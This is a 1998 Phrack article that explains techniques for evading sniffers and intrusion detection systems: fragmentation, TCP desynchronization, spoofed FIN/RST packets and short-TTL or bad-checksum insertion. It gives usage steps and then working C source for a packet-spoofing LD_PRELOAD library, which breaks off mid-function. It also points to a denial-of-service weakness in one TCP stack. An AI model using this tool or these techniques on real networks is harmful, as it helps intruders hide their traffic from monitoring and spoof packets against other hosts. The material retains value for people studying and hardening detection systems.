| ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 10 of 12 | |
| -------------------------[ Defeating Sniffers and Intrusion Detection Systems | |
| --------[ horizon <jmcdonal@unf.edu> | |
| ----[ Overview | |
| The purpose of this article is to demonstrate some techniques that can be used | |
| to defeat sniffers and intrusion detection systems. This article focuses | |
| mainly on confusing your average "hacker" sniffer, with some rough coverage of | |
| Intrusion Detection Systems (IDS). However, the methods and code present in | |
| this article should be a good starting point for getting your packets past ID | |
| systems. For an intense examination of attack techniques against IDS, check | |
| out: http://www.nai.com/products/security/advisory/papers/ids-html/doc000.asp. | |
| There are a large number of effective techniques other than those that are | |
| implemented in this article. I have chosen a few generic techniques that | |
| hopefully can be easily expanded into more targeted and complex attacks. After | |
| implementing these attacks, I have gone through and attempted to correlate | |
| them to the attacks described in the NAI paper, where appropriate. | |
| The root cause of the flaws discussed in this article is that most sniffers | |
| and intrusion detection systems do not have as robust of a TCP/IP | |
| implementation as the machines that are actually communicating on the network. | |
| Many sniffers and IDS use a form of datalink level access, such as BPF, DLPI, | |
| or SOCK_PACKET. The sniffer receives the entire datalink level frame, and | |
| gets no contextual clues from the kernel as to how that frame will be | |
| interpreted. Thus, the sniffer has the job of interpreting the entire packet | |
| and guessing how the kernel of the receiving machine is going to process it. | |
| Luckily, 95% of the time, the packet is going to be sane, and the kernel | |
| TCP/IP stack is going to behave rather predictably. It is the other 5% of the | |
| time that we will be focusing on. | |
| This article is divided into three sections: an overview of the techniques | |
| employed, a description of the implementation and usage, and the code. Where | |
| possible, the code has been implemented in a somewhat portable format: a | |
| shared library that wraps around connect(), which you can use LD_PRELOAD to | |
| "install" into your normal client programs. This shared library uses raw | |
| sockets to create TCP packets, which should work on most unixes. However, some | |
| of the attacks described are too complex to implement with raw sockets, so | |
| simple OpenBSD kernel patches are supplied. I am working on complementary | |
| kernel patches for Linux, which will be placed on the rhino9 web site when | |
| they are complete. The rhino9 web site is at: http://www.rhino9.ml.org/ | |
| ----[ Section 1. The Tricks | |
| The first set of tricks are solely designed to fool most sniffers, and will | |
| most likely have no effect on a decent ID system. The second set of tricks | |
| should be advanced enough to start to have an impact on the effectiveness of | |
| an intrusion detection system. | |
| Sniffer Specific Attacks | |
| ------------------------ | |
| 1. Sniffer Design - One Host Design | |
| The first technique is extremely simple, and takes advantage of the design of | |
| many sniffers. Several hacker sniffers are designed to follow one connection, | |
| and ignore everything else until that connection is closed or reaches some | |
| internal time out. Sniffers designed in this fashion have a very low profile, | |
| as far as memory usage and CPU time. However, they obviously miss a great deal | |
| of the data that can be obtained. This gives us an easy way of preventing our | |
| packets from being captured: before our connection, we send a spoofed SYN | |
| packet from a non-existent host to the same port that we are attempting to | |
| connect to. Thus, the sniffer sees the SYN packet, and if it is listening, it | |
| will set up its internal state to monitor all packets related to that | |
| connection. Then, when we make our connection, the sniffer ignores our SYN | |
| because it is watching the fake host. When the host later times out, our | |
| connection will not be logged because our initial SYN packet has long been | |
| sent. | |
| 2. Sniffer Design - IP options | |
| The next technique depends on uninformed coding practices within sniffers. | |
| If you look at the code for some of the hacker sniffers, namely ones based-off | |
| of the original linsniffer, you will see that they have a structure that looks | |
| like this: | |
| struct etherpacket | |
| { | |
| etherheader eh; | |
| ipheader ip; | |
| tcpheader tcp; | |
| char data[8192]; | |
| }; | |
| The sniffer will read a packet off of the datalink interface, and then slam it | |
| into that structure so it can analyze it easily. This should work fine most | |
| of the time. However, this approach makes a lot of assumptions: it assumes | |
| that the size of the IP header is 20 bytes, and it also assumes that the size | |
| of the TCP header is 20 bytes. If you send an IP packet with 40 bytes of | |
| options, then the sniffer is going to look inside your IP options for the TCP | |
| header, and completely misinterpret your packet. If the sniffer handles your | |
| IP header correctly, but incorrectly handles the TCP header, that doesn't buy | |
| you quite as much. In that situation, you get an extra 40 bytes of data that | |
| the sniffer will log. I have implemented mandatory IP options in the OpenBSD | |
| kernel such that it is manageable by a sysctl. | |
| 3. Insertion - FIN and RST Spoofing - Invalid Sequence Numbers | |
| This technique takes advantage of the fact that your typical sniffer is not | |
| going to keep track of the specific details of the ongoing connection. In a | |
| TCP connection, sequence numbers are used as a control mechanism for | |
| determining how much data has been sent, and the correct order for the data | |
| that has been sent. Most sniffers do not keep track of the sequence numbers | |
| in an ongoing TCP connection. This allows us to insert packets into the data | |
| stream that the kernel will disregard, but the sniffer will interpret as valid. | |
| The first technique we will use based on this is spoofing FIN and RST packets. | |
| FIN and RST are control flags inside the TCP packets, a FIN indicating the | |
| initiation of a shutdown sequence for one side of a connection, and an RST | |
| indicating that a connection should be immediately torn down. If we send a | |
| packet with a FIN or RST, with a sequence number that is far off of the current | |
| sequence number expected by the kernel, then the kernel will disregard it. | |
| However, the sniffer will likely regard this as a legitimate connection close | |
| request or connection reset, and cease logging. | |
| It is interesting to note that certain implementations of TCP stacks do not | |
| check the sequence numbers properly upon receipt of an RST. This obviously | |
| provides a large potential for a denial of service attack. Specifically, I | |
| have noticed that Digital Unix 4.0d will tear down connections without | |
| checking the sequence numbers on RST packets. | |
| 4. Insertion - Data Spoofing - Invalid Sequence Numbers | |
| This technique is a variation of the previous technique, which takes advantage | |
| of the fact that a typical sniffer will not follow the sequence numbers of a | |
| TCP connection. A lot of sniffers have a certain data capture length, such | |
| that they will stop logging a connection after that amount of data has been | |
| captured. If we send a large amount of data after the connection initiation, | |
| with completely wrong sequence numbers, our packets will be dropped by the | |
| kernel. However, the sniffer will potentially log all of that data as valid | |
| information. This is roughly an implementation of the "tcp-7" attack mentioned | |
| in the NAI paper. | |
| IDS / Sniffer Attacks: | |
| --------------------- | |
| The above techniques work suprisingly well for most sniffers, but they are not | |
| going to have much of an impact on most IDS. The next six techniques are a | |
| bit more complicated, but represent good starting points for getting past the | |
| more complex network monitors. | |
| 5. Evasion - IP Fragmentation | |
| IP fragmentation allows packets to be split over multiple datagrams in order | |
| to fit packets within the maximum transmission unit of the physical network | |
| interface. Typically, TCP is aware of the mtu, and doesn't send packets that | |
| need to be fragmented at an IP level. We can use this to our advantage to try | |
| to confuse sniffers and IDS. There are several potential attacks involving | |
| fragmentation, but we will only cover a simple one. We can send a TCP packet | |
| split over several IP datagrams such that the first 8 bytes of the TCP header | |
| are in a single packet, and the rest of the data is sent in 32 byte packets. | |
| This actually buys us a lot in our ability to fool a network analysis tool. | |
| First of all, the sniffer/IDS will have to be capable of doing fragment | |
| reassembly. Second of all, it will have to be capable of dealing with | |
| fragmented TCP headers. It turns out that this simple technique is more than | |
| sufficient to get your packets past most datalink level network monitors. | |
| This an another attack that I chose to implement as a sysctl in the OpenBSD | |
| kernel. | |
| This technique is very powerful in it's ability to get past most sniffers | |
| completely. However, it requires some experimentation because you have to | |
| make sure that your packets will get past all of the filters between you and | |
| the target. Certain packet filters wisely drop fragmented packets that look | |
| like they are going to rewrite the UDP/TCP header, or that look like they are | |
| unduly small. The implementation in this article provides a decent deal of | |
| control over the size of the fragments that your machine will output. This | |
| will allow you to implement the "frag-1" and "frag-2" attacks described in the | |
| NAI paper. | |
| 6. Desynchronization - Post Connection SYN | |
| If we are attempting to fool an intelligent sniffer, or an ID system, then we | |
| can be pretty certain that it will keep track of the TCP sequence numbers. For | |
| this technique, we will attempt to desynchronize the sniffer/IDS from the | |
| actual sequence numbers that the kernel is honoring. We will implement this | |
| attack by sending a post connection SYN packet in our data stream, which will | |
| have divergent sequence numbers, but otherwise meet all of the necessary | |
| criteria to be accepted by our target host. However, the target host will | |
| ignore this SYN packet, because it references an already established | |
| connection. The intent of this attack is to get the sniffer/IDS to | |
| resynchronize its notion of the sequence numbers to the new SYN packet. It | |
| will then ignore any data that is a legitimate part of the original stream, | |
| because it will be awaiting a different sequence number. If we succeed in | |
| resynchronizing the IDS with a SYN packet, we can then send an RST packet with | |
| the new sequence number and close down its notion of the connection. This | |
| roughly corresponds with the "tcbc-2" attack mentioned in the NAI paper. | |
| 7. Desynchronization - Pre Connection SYN | |
| Another attack we perform which is along this theme is to send an initial SYN | |
| before the real connection, with an invalid TCP checksum. If the sniffer is | |
| smart enough to ignore subsequent SYNs in a connection, but not smart enough | |
| to check the TCP checksum, then this attack will synchronize the sniffer/IDS | |
| to a bogus sequence number before the real connection occurs. This attack | |
| calls bind to get the kernel to assign a local port to the socket before | |
| calling connect. | |
| 8. Insertion - FIN and RST Spoofing - TCP checksum validation | |
| This technique is a variation of the FIN/RST spoofing technique mentioned | |
| above. However, this time we will attempt to send FIN and RST packets that | |
| should legitimately close the connection, with one notable exception: the TCP | |
| checksum will be invalid. These packets will be immediately dropped by the | |
| kernel, but potentially honored by the IDS/sniffer. This attack requires | |
| kernel support in order to determine the correct sequence numbers to use on | |
| the packet. This is similar to the "insert-2" attack in the NAI paper. | |
| 9. Insertion - Invalid Data - TCP checksum validation | |
| This technique is a variation of the previous data insertion attack, with the | |
| exception that we will be inserting data with the correct sequence numbers, | |
| but incorrect TCP checksums. This will serve to confuse and desynchronize | |
| sniffers and ID by feeding it a lot of data that will not be honored by the | |
| participating kernels. This attack requires kernel support to get the correct | |
| sequence numbers for the outgoing packets. This attack is also similar to the | |
| "insert-2" attack described in the NAI paper. | |
| 10. Insertion - FIN and RST Spoofing - Short TTL | |
| If the IDS or sniffer is sitting on the network such that it is one or more | |
| hops away from the host it is monitoring, then we can do a simple attack, | |
| utilizing the TTL field of the IP packet. For this attack, we determine the | |
| lowest TTL that can be used to reach the target host, and then subtract one. | |
| This allows us to send packets that will not reach the target host, but that | |
| have the potential of reaching the IDS or sniffer. In this attack, we send a | |
| couple of FIN packets, and a couple of RST packets. | |
| 11. Insertion - Data Spoofing - Short TTL | |
| For our final attack, we will send 8k of data with the correct sequence | |
| numbers and TCP checksums. However, the TTL will be one hop too short to reach | |
| our target host. | |
| Summary | |
| ------- | |
| All of these attacks work in concert to confuse sniffers and IDS. Here is a | |
| breakdown of the order in which we perform them: | |
| Attack 1 - One Host Sniffer Design. | |
| FAKEHOST -> TARGET SYN | |
| Attack 7 - Pre-connect Desynchronization Attempt. | |
| REALHOST -> TARGET SYN (Bad TCP Checksum, Arbitrary Seq Number) | |
| Kernel Activity | |
| REALHOST -> TARGET SYN (This is the real SYN, sent by our kernel) | |
| Attack 6 - Post-connect Desynchronization Attempt. | |
| REALHOST -> TARGET SYN (Arbitrary Seq Number X) | |
| REALHOST -> TARGET SYN (Seq Number X+1) | |
| Attack 4 - Data Spoofing - Invalid Sequence Numbers | |
| REALHOST -> TARGET DATA x 8 (1024 bytes, Seq Number X+2) | |
| Attack 5 - FIN/RST Spoofing - Invalid Sequence Numbers | |
| REALHOST -> TARGET FIN (Seq Number X+2+8192) | |
| REALHOST -> TARGET FIN (Seq Number X+3+8192) | |
| REALHOST -> TARGET RST (Seq Number X+4+8192) | |
| REALHOST -> TARGET RST (Seq Number X+5+8192) | |
| Attack 11 - Data Spoofing - TTL | |
| * REALHOST -> TARGET DATA x 8 (1024 bytes, Short TTL, Real Seq Number Y) | |
| Attack 10 - FIN/RST Spoofing - TTL | |
| * REALHOST -> TARGET FIN (Short TTL, Seq Number Y+8192) | |
| * REALHOST -> TARGET FIN (Short TTL, Seq Number Y+1+8192) | |
| * REALHOST -> TARGET RST (Short TTL, Seq Number Y+2+8192) | |
| * REALHOST -> TARGET RST (Short TTL, Seq Number Y+3+8192) | |
| Attack 9 - Data Spoofing - Checksum | |
| * REALHOST -> TARGET DATA x 8 (1024 bytes, Bad TCP Checksum, Real Seq Number Z) | |
| Attack 8 - FIN/RST Spoofing - Checksum | |
| * REALHOST -> TARGET FIN (Bad TCP Checksum, Seq Number Z+8192) | |
| * REALHOST -> TARGET FIN (Bad TCP Checksum, Seq Number Z+1+8192) | |
| * REALHOST -> TARGET RST (Bad TCP Checksum, Seq Number Z+2+8192) | |
| * REALHOST -> TARGET RST (Bad TCP Checksum, Seq Number Z+3+8192) | |
| The attacks with an asterisk require kernel support to determine the correct | |
| sequence numbers. Arguably, this could be done without kernel support, | |
| utilizing a datalink level sniffer, but it would make the code significantly | |
| more complex, because it would have to reassemble fragments, and do several | |
| validation checks in order to follow the real connection. The user can choose | |
| which of these attacks he/she would like to perform, and the sequence numbers | |
| will adjust themselves accordingly. | |
| ----[ Section 2 - Implementation and Usage | |
| My primary goal when implementing these techniques was to keep the changes | |
| necessary to normal system usage as slight as possible. I had to divide the | |
| techniques into two categories: attacks that can be performed from user | |
| context, and attacks that have to be augmented by the kernel in some fashion. | |
| My secondary goal was to make the userland set of attacks reasonably portable | |
| to other Unix environments, besides OpenBSD and Linux. | |
| The userland attacks are implemented using shared library redirection, an | |
| extremely useful technique borrowed from halflife's P51-08 article. The first | |
| program listed below, congestant.c, is a shared library that the user requests | |
| the loader to link first. This is done with the LD_PRELOAD environment | |
| variable on several unixes. For more information about this technique, refer | |
| to the original article by halflife. | |
| The shared library defines the connect symbol, thus pre-empting the normal | |
| connect function from libc (or libsocket) during the loading phase of program | |
| execution. Thus, you should be able to use these techniques with most any | |
| client program that utilizes normal BSD socket functionality. OpenBSD does | |
| not let us do shared library redirection (when you attempt to dlsym the old | |
| symbol out of libc, it gives you a pointer to the function you had pre-loaded). | |
| However, this is not a problem because we can just call the connect() syscall | |
| directly. | |
| This shared library has some definite drawbacks, but you get what you pay for. | |
| It will not work correctly with programs that do non-blocking connect calls, | |
| or RAW or datalink level access. Furthermore, it is designed for use on TCP | |
| sockets, and without kernel support to determine the type of a socket, it will | |
| attempt the TCP attacks on UDP connections. This support is currently only | |
| implemented under OpenBSD. However, this isn't that big of a drawback because | |
| it just sends a few packets that get ignored. Another drawback to the shared | |
| library is that it picks a sequence number out of the blue to represent the | |
| "wrong" sequence number. Due to this fact, there is a very small possibility | |
| that the shared library will pick a legitimate sequence number, and not | |
| desynchronize the stream. This, however, is extremely unlikely. | |
| A Makefile accompanies the shared library. Edit it to fit your host, and then | |
| go into the source file and make it point to your copy of libc.so, and you | |
| should be ready to go. The code has been tested on OpenBSD 2.3, 2.4, Debian | |
| Linux, Slackware Linux, Debian glibc Linux, Solaris 2.5, and Solaris 2.6. | |
| You can use the library like this: | |
| # export LD_PRELOAD=./congestion.so | |
| # export CONGCONF="DEBUG,OH,SC,SS,DS,FS,RS" | |
| # telnet www.blah.com | |
| The library will "wrap" around any connects in the programs you run from that | |
| point on, and provide you some protection behind the scenes. You can control | |
| the program by defining the CONGCONF environment variable. You give it a | |
| comma delimited list of attacks, which break out like this: | |
| DEBUG: Show debugging information | |
| OH: Do the One Host Design Attack | |
| SC: Spoof a SYN prior to the connect with a bad TCP checksum. | |
| SS: Spoof a SYN after the connection in a desynchronization attempt. | |
| DS: Insert 8k of data with bad sequence numbers. | |
| FS: Spoof FIN packets with bad sequence numbers. | |
| RS: Spoof RST packets with bad sequence numbers. | |
| DC: Insert 8k of data with bad TCP checksums. (needs kernel support) | |
| FC: Spoof FIN packets with bad TCP checksums. (needs kernel support) | |
| RC: Spoof RST packets with bad TCP checksums. (needs kernel support) | |
| DT: Insert 8k of data with short TTLs. (needs kernel support) | |
| FT: Spoof FIN packets with short TTLs. (needs kernel support) | |
| RT: Spoof RST packets with short TTLs. (needs kernel support) | |
| Kernel Support | |
| -------------- | |
| OpenBSD kernel patches are provided to facilitate several of the techniques | |
| described above. These patches have been made against the 2.4 source | |
| distribution. I have added three sysctl variables to the kernel, and one new | |
| system call. The three sysctl variables are: | |
| net.inet.ip.fraghackhead (integer) | |
| net.inet.ip.fraghackbody (integer) | |
| net.inet.ip.optionshack (integer) | |
| The new system call is getsockinfo(), and it is system call number 242. | |
| The three sysctl's can be used to modify the characteristics of every outgoing | |
| IP packet coming from the machine. The fraghackhead variable specifies a new | |
| mtu, in bytes, for outgoing IP datagrams. fraghackhead is applied to every | |
| outgoing datagram, unless fraghackbody is also defined. In that case, the mtu | |
| for the first fragment of a packet is read from fraghackhead, and the mtu for | |
| every consecutive fragment is read from fraghackbody. This allows you to | |
| force your machine into fragmenting all of its traffic, to any size that you | |
| specify. The reason it is divided into two variables is so that you can have | |
| the first fragment contain the entire TCP/UDP header, and have the following | |
| fragments be 8 or 16 bytes. This way, you can get your fragmented packets past | |
| certain filtering routers that block any sort of potential header rewriting. | |
| The optionshack sysctl allows you to turn on mandatory 40 bytes of NULL IP | |
| options on every outgoing packet. | |
| I implemented these controls such that they do not have any effect on packets | |
| sent through raw sockets. The implication of this is that our attacking | |
| packets will not be fragmented or contain IP options. | |
| Using these sysctl's is pretty simple: for the fraghack variables, you specify | |
| a number of bytes (or 0 to turn them off), and for the optionshack, you either | |
| set it to 0 or 1. Here is an example use: | |
| # sysctl -w net.inet.ip.optionshack=1 # 40 bytes added to header | |
| # sysctl -w net.inet.ip.fraghackhead=80 # 20 + 40 + 20 = full protocol header | |
| # sysctl -w net.inet.ip.fraghackbody=68 # 20 + 40 + 8 = smallest possible frag | |
| It is very important to note that you should be careful with the fraghack | |
| options. When you specify extreme fragmentation, you quickly eat up the | |
| memory that the kernel has available for storing packet headers. If memory | |
| usage is too high, you will notice sendto() returning a no buffer space error. | |
| If you stick to programs like telnet or ssh, that use small packets, then you | |
| should be fine with 28 or 28/36. However, if you use programs that use large | |
| packets like ftp or rcp, then you should bump fraghackbody up to a higher | |
| number, such as 200. | |
| The system call, getsockinfo, is needed by the userland program to determine if | |
| a socket is a TCP socket, and to query the kernel for the next sequence number | |
| that it expects to send on the next outgoing packet, as well as the next | |
| sequence number it expects to receive from it's peer. This allows the | |
| userland program to implement attacks based on having a correct sequence | |
| number, but some other flaw in the packet such as a short TTL or bad TCP | |
| checksum. | |
| Kernel Patch Installation | |
| ------------------------- | |
| Here are the steps I use to install the kernel patches. | |
| Disclaimer: I am not an experienced kernel programmer, so don't be too upset | |
| if your box gets a little flaky. The testing I've done on my own machines has | |
| gone well, but be aware that you really are screwing with critical stuff by | |
| installing these patches. You may suffer performance hits, or other such | |
| unpleasentries. But hey, you can't have any fun if you don't take any risks. :> | |
| Step 1. Apply the netinet.patch to /usr/src/sys/netinet/ | |
| Step 2. cp /usr/src/sys/netinet/in.h to /usr/include/netinet/in.h | |
| Step 3. go into /usr/src/usr.sbin/sysctl, and rebuild and install it | |
| Step 4. Apply kern.patch to /usr/src/sys/kern/ | |
| Step 5. cd /usr/src/sys/kern; make | |
| Step 6. Apply sys.patch to /usr/src/sys/sys/ | |
| Step 7. cd into your kernel build directory | |
| (/usr/src/sys/arch/XXX/compile/XXX), and do a make depend && make. | |
| Step 8. cp bsd /bsd, reboot, and cross your fingers. :> | |
| ----[ The Code | |
| <++> congestant/Makefile | |
| # OpenBSD | |
| LDPRE=-Bshareable | |
| LDPOST= | |
| OPTS=-DKERNELSUPPORT | |
| # Linux | |
| #LDPRE=-Bshareable | |
| #LDPOST=-ldl | |
| #OPTS= | |
| # Solaris | |
| #LDPRE=-G | |
| #LDPOST=-ldl | |
| #OPTS=-DBIG_ENDIAN=42 -DBYTEORDER=42 | |
| congestant.so: congestant.o | |
| ld ${LDPRE} -o congestant.so congestant.o ${LDPOST} | |
| congestant.o: congestant.c | |
| gcc ${OPTS} -fPIC -c congestant.c | |
| clean: | |
| rm -f congestant.o congestant.so | |
| <--> | |
| <++> congestant/congestant.c | |
| /* | |
| * congestant.c - demonstration of sniffer/ID defeating techniques | |
| * | |
| * by horizon <jmcdonal@unf.edu> | |
| * special thanks to stran9er, mea culpa, plaguez, halflife, and fyodor | |
| * | |
| * openbsd doesn't let us do shared lib redirection, so we implement the | |
| * connect system call directly. Also, the kernel support for certain attacks | |
| * is only implemented in openbsd. When I finish the linux support, it will | |
| * be available at http://www.rhino9.ml.org | |
| * | |
| * This whole thing is a conditionally compiling nightmare. :> | |
| * This has been tested under OpenBSD 2.3, 2.4, Solaris 2.5, Solaris 2.5.1, | |
| * Solaris 2.6, Debian Linux, and the glibc Debian Linux | |
| */ | |
| /* The path to our libc. (libsocket under Solaris) */ | |
| /* You don't need this if you are running OpenBSD */ | |
| /* #define LIB_PATH "/usr/lib/libsocket.so" */ | |
| #define LIB_PATH "/lib/libc-2.0.7.so" | |
| /* #define LIB_PATH "/usr/lib/libc.so" */ | |
| /* The source of our initial spoofed SYN in the One Host Design attack */ | |
| /* This has to be some host that will survive any outbound packet filters */ | |
| #define FAKEHOST "42.42.42.42" | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <sys/uio.h> | |
| #include <sys/stat.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <dlfcn.h> | |
| #include <netinet/in.h> | |
| #include <arpa/inet.h> | |
| #include <sys/time.h> | |
| #include <sys/socket.h> | |
| #include <sys/syscall.h> | |
| #if __linux__ | |
| #include <endian.h> | |
| #endif | |
| #include <errno.h> | |
| struct cong_config | |
| { | |
| int one_host_attack; | |
| int fin_seq; | |
| int rst_seq; | |
| int syn_seq; | |
| int data_seq; | |
| int data_chk; | |
| int fin_chk; | |
| int rst_chk; | |
| int syn_chk; | |
| int data_ttl; | |
| int fin_ttl; | |
| int rst_ttl; | |
| int ttl; | |
| } cong_config; | |
| int cong_init=0; | |
| int cong_debug=0; | |
| long cong_ttl_cache=0; | |
| int cong_ttl=0; | |
| /* If this is not openbsd, then we will use the connect symbol from libc */ | |
| /* otherwise, we will use syscall(SYS_connect, ...) */ | |
| #ifndef __OpenBSD__ | |
| #if __GLIBC__ == 2 | |
| int (*cong_connect)(int, __CONST_SOCKADDR_ARG, socklen_t)=NULL; | |
| #else | |
| int (*cong_connect)(int, const struct sockaddr *, int)=NULL; | |
| #endif | |
| #endif /* not openbsd */ | |
| #define DEBUG(x) if (cong_debug==1) fprintf(stderr,(x)); | |
| /* define our own headers so its easier to port. use cong_ to avoid any | |
| * potential symbol name collisions */ | |
| struct cong_ip_header | |
| { | |
| unsigned char ip_hl:4, /* header length */ | |
| ip_v:4; /* version */ | |
| unsigned char ip_tos; /* type of service */ | |
| unsigned short ip_len; /* total length */ | |
| unsigned short ip_id; /* identification */ | |
| unsigned short ip_off; /* fragment offset field */ | |
| #define IP_RF 0x8000 /* reserved fragment flag */ | |
| #define IP_DF 0x4000 /* dont fragment flag */ | |
| #define IP_MF 0x2000 /* more fragments flag */ | |
| #define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ | |
| unsigned char ip_ttl; /* time to live */ | |
| unsigned char ip_p; /* protocol */ | |
| unsigned short ip_sum; /* checksum */ | |
| unsigned long ip_src, ip_dst; /* source and dest address */ | |
| }; | |
| struct cong_icmp_header /* this is really an echo */ | |
| { | |
| unsigned char icmp_type; | |
| unsigned char icmp_code; | |
| unsigned short icmp_checksum; | |
| unsigned short icmp_id; | |
| unsigned short icmp_seq; | |
| unsigned long icmp_timestamp; | |
| }; | |
| struct cong_tcp_header | |
| { | |
| unsigned short th_sport; /* source port */ | |
| unsigned short th_dport; /* destination port */ | |
| unsigned int th_seq; /* sequence number */ | |
| unsigned int th_ack; /* acknowledgement number */ | |
| #if BYTE_ORDER == LITTLE_ENDIAN | |
| unsigned char th_x2:4, /* (unused) */ | |
| th_off:4; /* data offset */ | |
| #endif | |
| #if BYTE_ORDER == BIG_ENDIAN | |
| unsigned char th_off:4, /* data offset */ | |
| th_x2:4; /* (unused) */ | |
| #endif | |
| unsigned char th_flags; | |
| #define TH_FIN 0x01 | |
| #define TH_SYN 0x02 | |
| #define TH_RST 0x04 | |
| #define TH_PUSH 0x08 | |
| #define TH_ACK 0x10 | |
| #define TH_URG 0x20 | |
| unsigned short th_win; /* window */ | |
| unsigned short th_sum; /* checksum */ | |
| unsigned short th_urp; /* urgent pointer */ | |
| }; | |
| struct cong_pseudo_header | |
| { | |
| unsigned long saddr, daddr; | |
| char mbz; | |
| char ptcl; | |
| unsigned short tcpl; | |
| }; | |
| int cong_checksum(unsigned short* data, int length) | |
| { | |
| register int nleft=length; | |
| register unsigned short *w = data; | |
| register int sum=0; | |
| unsigned short answer=0; | |
| while (nleft>1) | |
| { | |
| sum+=*w++; | |
| nleft-=2; | |
| } | |
| if (nleft==1) | |
| { | |
| *(unsigned char *)(&answer) = *(unsigned char *)w; | |
| sum+=answer; | |
| } | |
| sum=(sum>>16) + (sum & 0xffff); | |
| sum +=(sum>>16); | |
| answer=~sum; | |
| return answer; | |
| } | |
| #define PHLEN (sizeof (struct cong_pseudo_header)) | |
| #define IHLEN (sizeof (struct cong_ip_header)) | |
| #define ICMPLEN (sizeof (struct cong_icmp_header)) | |
| #define THLEN (sizeof (struct cong_tcp_header)) | |
| /* Utility routine for the ttl attack. Sends an icmp echo */ | |
| void cong_send_icmp(long source, long dest, int seq, int id, int ttl) | |
| { | |
| struct sockaddr_in sa; | |
| int sock,packet_len; | |
| char *pkt; | |
| struct cong_ip_header *ip; | |
| struct cong_icmp_header *icmp; | |
| int on=1; | |
| if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) | |
| { | |
| perror("socket"); | |
| exit(1); | |
| } | |
| if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) | |
| { | |
| perror("setsockopt: IP_HDRINCL"); | |
| exit(1); | |
| } | |
| bzero(&sa,sizeof(struct sockaddr_in)); | |
| sa.sin_addr.s_addr = dest; | |
| sa.sin_family = AF_INET; | |
| pkt=calloc((size_t)1,(size_t)(IHLEN+ICMPLEN)); | |
| ip=(struct cong_ip_header *)pkt; | |
| icmp=(struct cong_icmp_header *)(pkt+IHLEN); | |
| ip->ip_v = 4; | |
| ip->ip_hl = IHLEN >>2; | |
| ip->ip_tos = 0; | |
| ip->ip_len = htons(IHLEN+ICMPLEN); | |
| ip->ip_id = htons(getpid() & 0xFFFF); | |
| ip->ip_off = 0; | |
| ip->ip_ttl = ttl; | |
| ip->ip_p = IPPROTO_ICMP ;//ICMP | |
| ip->ip_sum = 0; | |
| ip->ip_src = source; | |
| ip->ip_dst = dest; | |
| icmp->icmp_type=8; | |
| icmp->icmp_seq=htons(seq); | |
| icmp->icmp_id=htons(id); | |
| icmp->icmp_checksum=cong_checksum((unsigned short*)icmp,ICMPLEN); | |
| if(sendto(sock,pkt,IHLEN+ICMPLEN,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) | |
| { | |
| perror("sendto"); | |
| } | |
| free(pkt); | |
| close(sock); | |
| } | |
| /* Our main worker routine. sends a TCP packet */ | |
| void cong_send_tcp(long source, long dest,short int sport, short int dport, | |
| long seq, long ack, int flags, char *data, int dlen, | |
| int cksum, int ttl) | |
| { | |
| struct sockaddr_in sa; | |
| int sock,packet_len; | |
| char *pkt,*phtcp; | |
| struct cong_pseudo_header *ph; | |
| struct cong_ip_header *ip; | |
| struct cong_tcp_header *tcp; | |
| int on=1; | |
| if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) | |
| { | |
| perror("socket"); | |
| exit(1); | |
| } | |
| if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) | |
| { | |
| perror("setsockopt: IP_HDRINCL"); | |
| exit(1); | |
| } | |
| bzero(&sa,sizeof(struct sockaddr_in)); | |
| sa.sin_addr.s_addr = dest; | |
| sa.sin_family = AF_INET; | |
| sa.sin_port = dport; | |
| phtcp=calloc((size_t)1,(size_t)(PHLEN+THLEN+dlen)); | |
| pkt=calloc((size_t)1,(size_t)(IHLEN+THLEN+dlen)); | |
| ph=(struct cong_pseudo_header *)phtcp; | |
| tcp=(struct cong_tcp_header *)(((char *)phtcp)+PHLEN); | |
| ip=(struct cong_ip_header *)pkt; | |
| ph->saddr=source; | |
| ph->daddr=dest; | |
| ph->mbz=0; | |
| ph->ptcl=IPPROTO_TCP; | |
| ph->tcpl=htons(THLEN + dlen); | |
| tcp->th_sport=sport; | |
| tcp->th_dport=dport; | |
| tcp->th_seq=seq; | |
| tcp->th_ack=ack; | |
| tcp->th_off=THLEN/4; | |
| tcp->th_flags=flags; | |
| if (ack) tcp->th_flags|=TH_ACK; | |
| tcp->th_win=htons(16384); | |
| memcpy(&(phtcp[PHLEN+THLEN]),data,dlen); | |
| tcp->th_sum=cong_checksum((unsigned short*)phtcp,PHLEN+THLEN+dlen)+cksum; | |
| ip->ip_v = 4; | |
| ip->ip_hl = IHLEN >>2; | |
| ip->ip_tos = 0; | |
| ip->ip_len = htons(IHLEN+THLEN+dlen); | |
| ip->ip_id = htons(getpid() & 0xFFFF); | |
| ip->ip_off = 0; | |
| ip->ip_ttl = ttl; | |
| ip->ip_p = IPPROTO_TCP ;//TCP | |
| ip->ip_sum = 0; | |
| ip->ip_src = source; | |
| ip->ip_dst = dest; | |
| ip->ip_sum = cong_checksum((unsigned short*)ip,IHLEN); | |
| memcpy(((char *)(pkt))+IHLEN,(char *)tcp,THLEN+dlen); | |
| if(sendto(sock,pkt,IHLEN+THLEN+dlen,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) | |
| { | |
| perror("sendto"); | |
| } | |
| free(phtcp); | |
| free(pkt); | |
| close(sock); | |
| } | |
| /* Utility routine for data insertion attacks */ | |
| void cong_send_data(long source, long dest,short int sport, short int dport, | |
| long seq, long ack, int chk, int ttl) | |
| { | |
| char data[1024]; | |
| int i,j; | |
| for (i=0;i<8;i++) | |
| { | |
| for (j=0;j<1024;data[j++]=random()); | |
| cong_send_tcp(source, dest, sport, dport, htonl(seq+i*1024), | |
| htonl(ack), TH_PUSH, data, 1024, chk, ttl); | |
| } | |
| } | |
| /* Utility routine for the ttl attack - potentially unreliable */ | |
| /* This could be rewritten to look for the icmp ttl exceeded and count | |
| * the number of packets it receives, thus going much quicker. */ | |
| int cong_find_ttl(long source, long dest) | |
| { | |
| int sock; | |
| long timestamp; | |
| struct timeval tv,tvwait; | |
| int ttl=0,result=255; | |
| char buffer[8192]; | |
| int bread; | |
| fd_set fds; | |
